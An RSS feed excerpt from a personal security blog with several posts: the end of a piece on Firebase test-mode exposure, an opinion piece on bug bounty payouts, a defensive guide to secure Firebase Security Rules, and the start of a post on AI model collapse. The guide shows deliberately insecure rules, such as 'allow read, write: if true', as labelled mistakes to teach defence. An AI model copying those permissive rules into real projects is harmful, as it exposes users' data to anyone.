<li><p>Business data (customer lists, sales records, internal documents)</p>
</li>
</ul>
<p><strong>Common rule patterns</strong>:</p>
<pre><code class="lang-plaintext">// "Test mode" shipped to production
allow read, write: if true;

// "Any authenticated user" (not much better)
allow read, write: if request.auth != null;

// "Misconfigured cascading rules"
match /users/{userId} {
  allow read: if true;
  match /private/{document} {
    allow read: if false; // This doesn't work, parent rule grants access
  }
}
</code></pre>
<h1 id="heading-what-you-should-do">What You Should Do</h1>
<p><strong>Never use test mode</strong></p>
<p>Start with locked mode. Write rules from day one. Don't use test mode "just for development" because it’s much harder to add rules retrospectively or worse you will forget to change it.</p>
<p><strong>Version control your rules</strong></p>
<p>Include <code>firestore.rules</code> or <code>database.rules.json</code> in your repository. Review changes like you review code.</p>
<p><strong>Test your rules</strong></p>
<p>Use the Firebase Emulator to test rules locally. Write unit tests for your security rules. Don't rely on "it works in the console."</p>
<p><strong>Audit production rules regularly</strong></p>
<p>Set up monitoring for rule changes. Review your production rules monthly. Check for patterns like <code>if true</code> or missing auth checks.</p>
<p><strong>Use the principle of least privilege</strong></p>
<p>Default to denying access. Only grant access where specifically needed. Don't use <code>match /{document=**}</code> with broad permissions.</p>
<p><strong>Understand cascading rules</strong></p>
<p>In Realtime Database, parent rules override child rules. You can't restrict access at a child path if you granted it at a parent path.</p>
<p><strong>Use a tool to audit</strong></p>
<p>Run an audit before launching or during changes to ensure your infrastructure is secure with something like my tool, <a target="_blank" href="https://firescan.jacobalcock.co.uk/">FireScan</a>.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Firebase test mode is a trap. It's designed to get developers started quickly, but it creates a ticking time bomb if you forget to update your rules.</p>
<p>The 30-day expiration is supposed to prevent this. In practice, developers extend it or remove it entirely. Firebase doesn't prevent this because preventing it would create friction.</p>
<p>The security model is fundamentally broken: Firebase gives developers complete control over security through a complex rules language, then provides a "skip security" button (test mode) for convenience.</p>
<p>Developers click the skip button. They ship to production. They expose millions of user records. Firebase sends warning emails that get ignored.</p>
<p>The cycle continues. And millions of databases remain wide open because nobody forced the developer to understand security rules before deploying.</p>
<p>If you're using Firebase: audit your rules. Today. Don't trust that you "probably fixed it." Check your rules in the Firebase console right now.</p>
<p>The next person who discovers your open database might not disclose it responsibly.</p>
]]></content:encoded></item><item><title><![CDATA[Bug Bounty Platforms Are Exploiting Researchers]]></title><description><![CDATA[Bug bounty platforms claim to connect security researchers with companies. In reality, they're intermediaries extracting value from both sides while researchers do skilled labor for poor wages.
The economics are broken. Companies get critical vulnera...]]></description><link>https://blog.jacobalcock.co.uk/bug-bounty-platforms-are-exploiting-researchers</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/bug-bounty-platforms-are-exploiting-researchers</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Tue, 11 Nov 2025 21:33:34 GMT</pubDate><content:encoded><![CDATA[<p>Bug bounty platforms claim to connect security researchers with companies. In reality, they're intermediaries extracting value from both sides while researchers do skilled labor for poor wages.</p>
<p>The economics are broken. Companies get critical vulnerabilities fixed for less than a junior developer's daily rate. Platforms take 20% cuts for running a web form. Researchers get paid $500 for finding bugs that would cost $50,000 or more on the gray market.</p>
<p>Nobody in this equation benefits except the platforms. A critical remote code execution vulnerability in a SaaS product should be worth significantly more than what bug bounty programs pay. Here's the actual market rate comparison:</p>
<ul>
<li><p><strong>Bug Bounty Program</strong>: $500 - $5,000</p>
</li>
<li><p><strong>Responsible Disclosure (no bounty)</strong>: $0</p>
</li>
<li><p><strong>Gray Market (Zerodium, etc.)</strong>: $50,000 - $500,000</p>
</li>
<li><p><strong>Nation-State Buyers</strong>: $500,000 - $2,500,000</p>
</li>
</ul>
<p>The gap between bug bounty payouts and actual market value is 100x to 500x. Researchers are expected to do the right thing while leaving 99% of the value on the table.</p>
<h1 id="heading-economics">Economics</h1>
<p>Most bug bounty platforms take a 20% cut. Some charge companies setup fees, monthly fees, or take even larger percentages. Here's what that looks like:</p>
<ul>
<li><p><strong>Researcher finds critical RCE</strong>: 40 hours of work</p>
</li>
<li><p><strong>Company bounty</strong>: $2,500 <strong>Platform cut (20%)</strong>: $500</p>
</li>
<li><p><strong>Researcher payout</strong>: $2,000</p>
</li>
<li><p><strong>Effective hourly rate</strong>: $50/hour</p>
</li>
</ul>
<p>That $50/hour is before:</p>
<ul>
<li><p>Taxes (20-40% depending on jurisdiction and other factors)</p>
</li>
<li><p>Time spent on duplicates and rejected reports</p>
</li>
<li><p>Infrastructure costs (VPS, tools, domains for testing)</p>
</li>
<li><p>Unpaid time learning and researching new vulnerabilities</p>
</li>
</ul>
<p>Real effective rate after accounting for all work: $15-20/hour for skilled security work.</p>
<p>Meanwhile, penetration testers bill $200-400/hour. The same researcher doing the same work gets paid 10-20x less through bug bounties.</p>
<h1 id="heading-duplicates">Duplicates</h1>
<p>Most serious vulnerabilities are found within hours of program launch by multiple researchers simultaneously. Only the first report gets paid.</p>
<p>You spend 20 hours finding a critical SQL injection. You write a detailed report with proof-of-concept, impact analysis, and remediation steps. You submit it.</p>
<p>"Duplicate. This was already reported 30 minutes ago."</p>
<p>You get $0. The platform still takes their 20% from the other researcher's payout. You subsidised their business model with free labor.</p>
<h1 id="heading-triage">Triage</h1>
<p>Bug bounty platforms employ "triage teams" to review submissions. In theory, this helps companies by filtering out noise. In practice, it adds another layer that doesn't understand the reported vulnerability.</p>
<p>I've seen critical vulnerabilities marked as "informational" by triage teams because they didn't understand the exploit chain. I've seen SQLi marked as duplicate of XSS because both were "injection vulnerabilities." I've seen valid reports closed as "won't fix" and then silently patched two weeks later with no payout.</p>
<p>The triage team has zero incentive to advocate for researchers. They're paid by the platform, which is paid by companies. Their incentive is to minimise payouts and close reports quickly.</p>
<h1 id="heading-scope-creep-and-retroactive-rules">Scope Creep and Retroactive Rules</h1>
<p>You spend weeks testing a target. You find a critical vulnerability in a domain that's in scope. You report it.</p>
<p>"Out of scope. We updated the scope yesterday to exclude that subdomain."</p>
<p>Or:</p>
<p>"This type of vulnerability is excluded per our policy update from last week."</p>
<p>Or my personal favorite:</p>
<p>"This is a duplicate of a vulnerability we fixed last year and never disclosed."</p>
<p>Bug bounty programs can change rules retroactively. Researchers have no recourse. The platform sides with the paying customer (the company) every time.</p>
<h1 id="heading-a-race-to-the-bottom">A Race to the Bottom</h1>
<p>Because bug bounties pay so little, they attract researchers who:</p>
<ol>
<li><p>Are in countries with low cost of living</p>
</li>
<li><p>Are students/hobbyists who don't value their time</p>
</li>
<li><p>Use automated scanners and submit everything (creating noise)</p>
</li>
<li><p>Don't know their work is worth 100x more</p>
</li>
</ol>
<p>This creates a race to the bottom. Why would a company pay $10,000 when someone in a developing country will report it for $500? Why would platforms advocate for higher payouts when volume is more profitable than quality?</p>
<p>The result: experienced researchers leave the bug bounty ecosystem. Quality of reports declines. Companies get flooded with low-quality automated scanner output. Everyone loses except the platforms, who get paid per report processed.</p>
<h1 id="heading-publicity">Publicity</h1>
<p>Many bug bounty programs exist purely for PR. "We have a bug bounty program" signals that the company takes security seriously. The actual payouts tell a different story:</p>
<ul>
<li><p>Maximum bounty: $10,000 (looks good in marketing)</p>
</li>
<li><p>Average bounty paid: $150</p>
</li>
<li><p>Median bounty paid: $50</p>
</li>
<li><p>Number of critical vulnerabilities found: 47</p>
</li>
<li><p>Highest payout for critical vulnerability: $500</p>
</li>
</ul>
<p>The "$10,000 maximum bounty" is marketing. The reality is $50 for finding exploitable bugs in production systems.</p>
<h1 id="heading-exposure">"Exposure"</h1>
<p>Platforms and companies defend low bounties with:</p>
<p>"You get exposure!" "You're building your reputation!" "It's responsible disclosure!" "Think of it as practice!"</p>
<p>This is the same argument used to exploit artists, musicians, and writers. "Work for free/cheap for the exposure."</p>
<p>Security researchers don't need exposure. They need money. Skills that find RCE in production systems are worth real money. Asking researchers to work for "reputation points" while companies save millions on security audits is exploitation.</p>
<h1 id="heading-what-companies-are-actually-saving">What Companies Are Actually Saving</h1>
<p>A professional penetration test costs $5,000 - $50,000+ depending on scope. Companies using bug bounties as their primary security testing model are getting:</p>
<ul>
<li><p>Continuous testing (not point-in-time)</p>
</li>
<li><p>Diverse researcher skill sets</p>
</li>
<li><p>Global coverage (researchers in all time zones)</p>
</li>
<li><p>No upfront costs</p>
</li>
<li><p>Pay-per-vulnerability instead of flat fee</p>
</li>
</ul>
<p>A bug bounty program that pays out $100,000/year is replacing $500,000+ worth of professional security testing. The platform takes $20,000 of that. Researchers split $80,000 while doing half a million dollars worth of work.</p>
<p><strong>The value extraction is staggering.</strong></p>
<h1 id="heading-revenue-models">Revenue Models</h1>
<p>Bug bounty platforms are profitable businesses. HackerOne, Bugcrowd, Synack - all have raised hundreds of millions in VC funding. Their unit economics work because:</p>
<ul>
<li><p>Take 20% of all payouts (pure margin)</p>
</li>
<li><p>Charge companies platform fees</p>
</li>
<li><p>Sell "managed programs" at premium prices</p>
</li>
<li><p>Pay researchers as little as possible</p>
</li>
<li><p>No inventory, no overhead, no liability</p>
</li>
</ul>
<p>It's a classic marketplace play: connect two sides, extract maximum value, provide minimum infrastructure.</p>
<p>The researcher does the skilled work. The company gets the value. The platform takes the cut. Who's being exploited here?</p>
<h1 id="heading-what-actually-needs-to-change">What Actually Needs to Change</h1>
<ul>
<li><p><strong>Minimum bounty standards</strong>: Critical vulnerabilities should have floor prices ($10,000+)</p>
</li>
<li><p><strong>No platform cuts on bounties</strong>: Platforms should charge companies directly, not take cuts from researcher payouts</p>
</li>
<li><p><strong>Duplicate protection</strong>: If multiple researchers find the same bug within a reasonable window, split the bounty</p>
</li>
<li><p><strong>Binding scope</strong>: Companies can't change scope retroactively to avoid payouts</p>
</li>
<li><p><strong>Independent arbitration</strong>: Disputes resolved by third parties, not platform-employed triage teams</p>
</li>
<li><p><strong>Disclosure rights</strong>: Researchers can disclose after 90 days regardless of fix status</p>
</li>
</ul>
<p>None of this will happen voluntarily. Platforms are profitable under the current model. Companies get cheap security testing. Researchers lack negotiating power.</p>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<p>Bug bounty platforms have successfully convinced the security industry that paying researchers 1% of market value is "ethical" and "responsible."</p>
<p>It's not. It's exploitation with good PR.</p>
<p>The platforms extract value by positioning themselves between researchers and companies, taking cuts while providing minimal infrastructure. Companies get professional security testing at fraction of market rates. Researchers get poverty wages for skilled work.</p>
<p>The bug bounty model could work if payouts reflected actual value. A critical RCE should pay $50,000, not $500. Platforms should charge companies service fees, not extract from researcher payouts. Duplicates should be handled fairly.</p>
<p>But that would require platforms to care about researchers as much as they care about companies. And companies are the ones paying the bills.</p>
<p>So instead, we have a system that works great for platforms and companies, and barely works for researchers. And we call it "ethical hacking."</p>
<p>The economics are broken. The incentives are broken. The only question is how long researchers will keep accepting it.</p>
]]></content:encoded></item><item><title><![CDATA[How to Write Secure Firebase Rules]]></title><description><![CDATA[Firebase Security Rules are the only thing protecting your data from unauthorised access. This guide covers how to write rules that actually secure your app.
Understanding the Basics
Firebase Security Rules work by matching paths and applying conditi...]]></description><link>https://blog.jacobalcock.co.uk/how-to-write-secure-firebase-rules</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/how-to-write-secure-firebase-rules</guid><category><![CDATA[Firebase]]></category><category><![CDATA[Security]]></category><category><![CDATA[firestore]]></category><category><![CDATA[development]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Sun, 09 Nov 2025 17:43:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762710212505/148ab434-ec91-4b3c-b6b1-268ec0d0ada4.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Firebase Security Rules are the only thing protecting your data from unauthorised access. This guide covers how to write rules that actually secure your app.</p>
<h1 id="heading-understanding-the-basics">Understanding the Basics</h1>
<p>Firebase Security Rules work by matching paths and applying conditions. If the condition evaluates to <code>true</code>, the request is allowed. If <code>false</code>, it's denied.</p>
<h2 id="heading-cloud-firestore-rules-structure">Cloud Firestore Rules Structure</h2>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Your rules go here
    match /collection/{document} {
      allow read, write: if &lt;condition&gt;;
    }
  }
}
</code></pre>
<h2 id="heading-realtime-database-rules-structure">Realtime Database Rules Structure</h2>
<pre><code class="lang-plaintext">{
  "rules": {
    "path": {
      ".read": "&lt;condition&gt;",
      ".write": "&lt;condition&gt;"
    }
  }
}
</code></pre>
<h2 id="heading-key-concepts">Key Concepts</h2>
<ul>
<li><p><strong>Match blocks</strong>: Define which paths the rule applies to</p>
</li>
<li><p><strong>Allow statements</strong>: Specify what operations are permitted</p>
</li>
<li><p><strong>Conditions</strong>: Boolean expressions that grant or deny access</p>
</li>
<li><p><strong>Variables</strong>: <code>request</code> (incoming request data) and <code>resource</code> (existing data)</p>
</li>
</ul>
<h1 id="heading-rule-methods">Rule Methods</h1>
<p>Firestore rules support granular methods:</p>
<ul>
<li><p><code>read</code>: Covers both <code>get</code> (single document) and <code>list</code> (queries)</p>
</li>
<li><p><code>write</code>: Covers <code>create</code>, <code>update</code>, and <code>delete</code></p>
</li>
<li><p><code>get</code>: Read a single document</p>
</li>
<li><p><code>list</code>: Read queries and collections</p>
</li>
<li><p><code>create</code>: Write new documents</p>
</li>
<li><p><code>update</code>: Modify existing documents</p>
</li>
<li><p><code>delete</code>: Remove documents</p>
</li>
</ul>
<pre><code class="lang-plaintext">// Granular control
match /posts/{postId} {
  allow get: if true;  // Anyone can read a single post
  allow list: if request.auth != null;  // Only authenticated users can query
  allow create: if request.auth != null;  // Only authenticated users can create
  allow update: if request.auth.uid == resource.data.authorId;  // Only author can update
  allow delete: if request.auth.uid == resource.data.authorId;  // Only author can delete
}
</code></pre>
<h1 id="heading-common-secure-patterns">Common Secure Patterns</h1>
<h2 id="heading-pattern-1-user-can-only-access-their-own-data">Pattern 1: User Can Only Access Their Own Data</h2>
<p><strong>Use case</strong>: User profiles, private documents, personal settings</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /users/{userId} {
  allow read, write: if request.auth != null &amp;&amp; request.auth.uid == userId;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-2-public-read-authenticated-write">Pattern 2: Public Read, Authenticated Write</h2>
<p><strong>Use case</strong>: Blog posts, public content, product listings</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /posts/{postId} {
  allow read: if true;
  allow create: if request.auth != null;
  allow update, delete: if request.auth != null
                         &amp;&amp; request.auth.uid == resource.data.authorId;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "posts": {
      "$postId": {
        ".read": true,
        ".write": "auth != null &amp;&amp; (!data.exists() || data.child('authorId').val() === auth.uid)"
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-3-role-based-access-using-custom-claims">Pattern 3: Role-Based Access Using Custom Claims</h2>
<p><strong>Use case</strong>: Admin panels, multi-role applications</p>
<p><strong>Setup custom claims</strong> (server-side):</p>
<pre><code class="lang-plaintext">const admin = require('firebase-admin');

// Set custom claims
await admin.auth().setCustomUserClaims(uid, { admin: true });
</code></pre>
<p><strong>Firestore rules</strong>:</p>
<pre><code class="lang-plaintext">match /adminData/{document} {
  allow read, write: if request.auth.token.admin == true;
}

match /posts/{postId} {
  allow read: if true;
  allow write: if request.auth.token.editor == true
               || request.auth.token.admin == true;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "adminData": {
      ".read": "auth.token.admin === true",
      ".write": "auth.token.admin === true"
    }
  }
}
</code></pre>
<h2 id="heading-pattern-4-data-validation">Pattern 4: Data Validation</h2>
<p><strong>Use case</strong>: Ensuring data format and required fields</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /posts/{postId} {
  allow create: if request.auth != null
                &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                &amp;&amp; request.resource.data.title is string
                &amp;&amp; request.resource.data.title.size() &gt; 0
                &amp;&amp; request.resource.data.title.size() &lt; 200
                &amp;&amp; request.resource.data.authorId == request.auth.uid;

  allow update: if request.auth != null
                &amp;&amp; request.auth.uid == resource.data.authorId
                &amp;&amp; request.resource.data.authorId == resource.data.authorId; // Prevent changing author
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "posts": {
      "$postId": {
        ".write": "auth != null &amp;&amp; newData.hasChildren(['title', 'content', 'authorId'])",
        "title": {
          ".validate": "newData.isString() &amp;&amp; newData.val().length &gt; 0 &amp;&amp; newData.val().length &lt; 200"
        },
        "authorId": {
          ".validate": "newData.val() === auth.uid &amp;&amp; (!data.exists() || data.val() === newData.val())"
        }
      }
    }
  }
}
</code></pre>
<h2 id="heading-pattern-5-attribute-based-access-data-driven-roles">Pattern 5: Attribute-Based Access (Data-Driven Roles)</h2>
<p><strong>Use case</strong>: Shared documents, team access, permission-based systems</p>
<p><strong>Firestore</strong>:</p>
<pre><code class="lang-plaintext">match /projects/{projectId} {
  allow read: if request.auth != null
              &amp;&amp; request.auth.uid in resource.data.members;

  allow write: if request.auth != null
               &amp;&amp; request.auth.uid in resource.data.admins;
}
</code></pre>
<p><strong>Realtime Database</strong>:</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "projects": {
      "$projectId": {
        ".read": "auth != null &amp;&amp; data.child('members').child(auth.uid).exists()",
        ".write": "auth != null &amp;&amp; data.child('admins').child(auth.uid).exists()"
      }
    }
  }
}
</code></pre>
<h1 id="heading-using-functions-for-reusable-logic">Using Functions for Reusable Logic</h1>
<p>Functions make rules more maintainable and readable.</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Check if user is authenticated
    function isSignedIn() {
      return request.auth != null;
    }

    // Check if user owns the resource
    function isOwner(userId) {
      return request.auth.uid == userId;
    }

    // Check if user has a specific role
    function hasRole(role) {
      return isSignedIn() &amp;&amp; request.auth.token[role] == true;
    }

    // Validate required fields
    function hasRequiredFields(fields) {
      return request.resource.data.keys().hasAll(fields);
    }

    // Use the functions
    match /users/{userId} {
      allow read: if isSignedIn();
      allow write: if isOwner(userId);
    }

    match /posts/{postId} {
      allow create: if isSignedIn()
                    &amp;&amp; hasRequiredFields(['title', 'content', 'authorId'])
                    &amp;&amp; isOwner(request.resource.data.authorId);

      allow update: if isOwner(resource.data.authorId);
      allow delete: if isOwner(resource.data.authorId) || hasRole('admin');
    }
  }
}
</code></pre>
<h1 id="heading-handling-subcollections">Handling Subcollections</h1>
<p>In Firestore, rules don't cascade to subcollections. You must explicitly define rules for each level.</p>
<pre><code class="lang-plaintext">match /users/{userId} {
  allow read: if request.auth.uid == userId;

  // Subcollection requires its own rules
  match /privateData/{document} {
    allow read, write: if request.auth.uid == userId;
  }

  // Another subcollection
  match /posts/{postId} {
    allow read: if true;  // Public read
    allow write: if request.auth.uid == userId;  // Only owner can write
  }
}
</code></pre>
<p><strong>Important</strong>: A match like <code>/users/{userId}/{document=**}</code> will match ALL nested subcollections recursively. Use this carefully.</p>
<pre><code class="lang-plaintext">// This matches /users/{userId}/anything/at/any/depth
match /users/{userId}/{document=**} {
  allow read: if request.auth.uid == userId;
}
</code></pre>
<h1 id="heading-realtime-database-cascading-rules">Realtime Database: Cascading Rules</h1>
<p>In Realtime Database, rules CASCADE. Parent rules override child rules.</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      // This grants read access to all user data
      ".read": "auth != null",
      "$userId": {
        // This CANNOT restrict the read access granted above
        ".read": "$userId === auth.uid",  // This is IGNORED
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<p><strong>Correct approach</strong>: Don't grant broad access at parent levels.</p>
<pre><code class="lang-plaintext">{
  "rules": {
    "users": {
      "$userId": {
        ".read": "$userId === auth.uid",
        ".write": "$userId === auth.uid"
      }
    }
  }
}
</code></pre>
<h1 id="heading-testing-your-rules">Testing Your Rules</h1>
<h2 id="heading-use-firescan">Use FireScan</h2>
<p>Try out my purpose built tool for auditing firebase infrastructure. It’s completely free, open-source and available for anyone to use. Check it out <a target="_blank" href="https://firescan.jacobalcock.co.uk/">here</a>.</p>
<h2 id="heading-use-the-firebase-emulator">Use the Firebase Emulator</h2>
<p>Install and run locally:</p>
<pre><code class="lang-plaintext">npm install -g firebase-tools
firebase init emulators
firebase emulators:start
</code></pre>
<h2 id="heading-use-the-rules-simulator-in-firebase-console">Use the Rules Simulator in Firebase Console</h2>
<p>Navigate to Firestore/Realtime Database → Rules → Playground</p>
<ul>
<li><p>Select operation type (get, list, create, etc.)</p>
</li>
<li><p>Choose authenticated or unauthenticated</p>
</li>
<li><p>Specify the path</p>
</li>
<li><p>Run simulation</p>
</li>
</ul>
<p>This is useful for quick checks but not a substitute for proper testing.</p>
<h1 id="heading-common-mistakes-to-avoid">Common Mistakes to Avoid</h1>
<h2 id="heading-1-using-if-true-in-production">1. Using <code>if true</code> in Production</h2>
<pre><code class="lang-plaintext">// NEVER DO THIS
match /{document=**} {
  allow read, write: if true;
}
</code></pre>
<h2 id="heading-2-relying-only-on-requestauth-null">2. Relying Only on <code>request.auth != null</code></h2>
<pre><code class="lang-plaintext">// This allows ANY authenticated user to access ANY data
match /users/{userId} {
  allow read, write: if request.auth != null;  // Too permissive
}

// Better: verify the user matches
match /users/{userId} {
  allow read, write: if request.auth != null &amp;&amp; request.auth.uid == userId;
}
</code></pre>
<h2 id="heading-3-forgetting-realtime-database-cascade-rules">3. Forgetting Realtime Database Cascade Rules</h2>
<pre><code class="lang-plaintext">{
  "rules": {
    "data": {
      ".read": true,  // Grants read to everything below
      "private": {
        ".read": false  // This is IGNORED, read was already granted above
      }
    }
  }
}
</code></pre>
<h2 id="heading-4-not-validating-data-on-createupdate">4. Not Validating Data on Create/Update</h2>
<pre><code class="lang-plaintext">// Bad: No validation
match /posts/{postId} {
  allow create: if request.auth != null;
}

// Good: Validate required fields and author
match /posts/{postId} {
  allow create: if request.auth != null
                &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId'])
                &amp;&amp; request.resource.data.authorId == request.auth.uid;
}
</code></pre>
<h2 id="heading-5-allowing-field-modification-that-shouldnt-change">5. Allowing Field Modification That Shouldn't Change</h2>
<pre><code class="lang-plaintext">// Bad: User can change the author
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId;
}

// Good: Prevent changing the author field
match /posts/{postId} {
  allow update: if request.auth.uid == resource.data.authorId
                &amp;&amp; request.resource.data.authorId == resource.data.authorId;
}
</code></pre>
<h2 id="heading-6-overusing-get-and-exists">6. Overusing <code>get()</code> and <code>exists()</code></h2>
<p>Each <code>get()</code> or <code>exists()</code> call in your rules counts as a read operation and costs money. You're also limited to 10 calls per request.</p>
<pre><code class="lang-plaintext">// Bad: Multiple get() calls
match /posts/{postId} {
  allow read: if get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'reader'
              || get(/databases/$(database)/documents/users/$(request.auth.uid)).data.role == 'admin';
}

// Better: Use custom claims or structure data differently
match /posts/{postId} {
  allow read: if request.auth.token.reader == true
              || request.auth.token.admin == true;
}
</code></pre>
<h1 id="heading-version-control-your-rules">Version Control Your Rules</h1>
<p>Keep your rules in source control alongside your code.</p>
<p><strong>Add to</strong> <code>.gitignore</code> if needed:</p>
<pre><code class="lang-plaintext"># Don't ignore rules files
!firestore.rules
!database.rules.json
</code></pre>
<p><strong>Example</strong> <code>firestore.rules</code>:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // All your rules here
  }
}
</code></pre>
<p><strong>Deploy with Firebase CLI</strong>:</p>
<pre><code class="lang-plaintext">firebase deploy --only firestore:rules
firebase deploy --only database
</code></pre>
<h1 id="heading-deployment-checklist">Deployment Checklist</h1>
<p>Before deploying rules to production:</p>
<ul>
<li><p>Remove all <code>if true</code> or <code>if false</code> test rules</p>
</li>
<li><p>Verify authentication checks on all sensitive paths</p>
</li>
<li><p>Test rules using the emulator with unit tests</p>
</li>
<li><p>Check for cascading rule issues (Realtime Database)</p>
</li>
<li><p>Validate required fields on create/update operations</p>
</li>
<li><p>Ensure users can't modify fields they shouldn't (like <code>authorId</code>)</p>
</li>
<li><p>Review <code>get()</code> and <code>exists()</code> usage (limit of 10 per request)</p>
</li>
<li><p>Test with authenticated and unauthenticated contexts</p>
</li>
<li><p>Version control your rules</p>
</li>
<li><p>Use <code>firebase deploy --only firestore:rules</code> (don't deploy everything)</p>
</li>
</ul>
<h1 id="heading-complete-example-blog-application">Complete Example: Blog Application</h1>
<p>Here's a complete, production-ready ruleset for a blog app:</p>
<pre><code class="lang-plaintext">rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {

    // Helper functions
    function isSignedIn() {
      return request.auth != null;
    }

    function isOwner(uid) {
      return isSignedIn() &amp;&amp; request.auth.uid == uid;
    }

    function isAdmin() {
      return isSignedIn() &amp;&amp; request.auth.token.admin == true;
    }

    // User profiles
    match /users/{userId} {
      allow read: if isSignedIn();
      allow create: if isOwner(userId)
                    &amp;&amp; request.resource.data.keys().hasAll(['displayName', 'email'])
                    &amp;&amp; request.resource.data.email == request.auth.token.email;
      allow update: if isOwner(userId)
                    &amp;&amp; request.resource.data.email == resource.data.email; // Prevent email change
      allow delete: if isOwner(userId) || isAdmin();
    }

    // Blog posts
    match /posts/{postId} {
      allow read: if resource.data.published == true || isOwner(resource.data.authorId) || isAdmin();
      allow create: if isSignedIn()
                    &amp;&amp; request.resource.data.keys().hasAll(['title', 'content', 'authorId', 'published', 'createdAt'])
                    &amp;&amp; isOwner(request.resource.data.authorId)
                    &amp;&amp; request.resource.data.title is string
                    &amp;&amp; request.resource.data.title.size() &gt; 0
                    &amp;&amp; request.resource.data.title.size() &lt;= 200
                    &amp;&amp; request.resource.data.createdAt == request.time;
      allow update: if isOwner(resource.data.authorId)
                    &amp;&amp; request.resource.data.authorId == resource.data.authorId  // Prevent author change
                    &amp;&amp; request.resource.data.createdAt == resource.data.createdAt;  // Prevent timestamp change
      allow delete: if isOwner(resource.data.authorId) || isAdmin();

      // Comments subcollection
      match /comments/{commentId} {
        allow read: if true;
        allow create: if isSignedIn()
                      &amp;&amp; request.resource.data.keys().hasAll(['text', 'authorId', 'createdAt'])
                      &amp;&amp; isOwner(request.resource.data.authorId)
                      &amp;&amp; request.resource.data.text.size() &gt; 0
                      &amp;&amp; request.resource.data.text.size() &lt;= 1000;
        allow update: if isOwner(resource.data.authorId)
                      &amp;&amp; request.resource.data.authorId == resource.data.authorId;
        allow delete: if isOwner(resource.data.authorId) || isAdmin();
      }
    }
  }
}
</code></pre>
<h1 id="heading-final-thoughts">Final Thoughts</h1>
<ol>
<li><p><strong>Default to denying access</strong>. Only grant permissions where specifically needed.</p>
</li>
<li><p><strong>Always verify authentication</strong> with <code>request.auth != null</code> and check user ownership.</p>
</li>
<li><p><strong>Validate data</strong> on create and update operations.</p>
</li>
<li><p><strong>Prevent field tampering</strong> by ensuring critical fields don't change on update.</p>
</li>
<li><p><strong>Use custom claims</strong> for roles instead of repeated <code>get()</code> calls.</p>
</li>
<li><p><strong>Test your rules</strong> with the emulator and unit tests before deploying.</p>
</li>
<li><p><strong>Version control</strong> your rules and review changes like code.</p>
</li>
<li><p><strong>Understand cascading</strong> (Realtime Database) vs explicit subcollection rules (Firestore).</p>
</li>
</ol>
<p>Firebase Security Rules are powerful but require careful implementation. Take the time to write them correctly, test them thoroughly, and audit them regularly.</p>
<p>Your rules are the only thing standing between your data and unauthorised access. Make them count.</p>
]]></content:encoded></item><item><title><![CDATA[Model Collapse: The AI Feedback Loop Problem Nobody Wants to Talk About]]></title><description><![CDATA[AI models are eating their own tail, and it's going to be a problem.
The entire premise of modern LLMs is that they're trained on human-generated content. Books, articles, research papers, Stack Overflow answers, GitHub repositories - billions of tok...]]></description><link>https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about</link><guid isPermaLink="true">https://blog.jacobalcock.co.uk/model-collapse-the-ai-feedback-loop-problem-nobody-wants-to-talk-about</guid><category><![CDATA[AI]]></category><category><![CDATA[llm]]></category><category><![CDATA[Machine Learning]]></category><category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Jacob Alcock]]></dc:creator><pubDate>Fri, 07 Nov 2025 21:22:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/0Jk1QCGMz5o/upload/6df4cc9cb921d7503ecfb9a66a6db354.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AI models are eating their own tail, and it's going to be a problem.</p>
<p>The entire premise of modern LLMs is that they're trained on human-generated content. Books, articles, research papers, Stack Overflow answers, GitHub repositories - billions of tokens of actual human knowledge. But that assumption is breaking down faster than anyone wants to admit.</p>
<h1 id="heading-the-core-issue">The Core Issue</h1>
<p>As we approach the end of 2025, the web is saturated with AI-generated content:</p>
<ul>
<li><p>Stack Overflow answers copy-pasted from ChatGPT</p>
</li>
<li><p>GitHub repos with AI-generated documentation and comments</p>
</li>
<li><p>Blog posts churned out by content farms using GPT</p>
</li>
<li><p>Social media posts from bots</p>
</li>
<li><p>Technical articles written entirely by LLMs</p>
</li>
</ul>
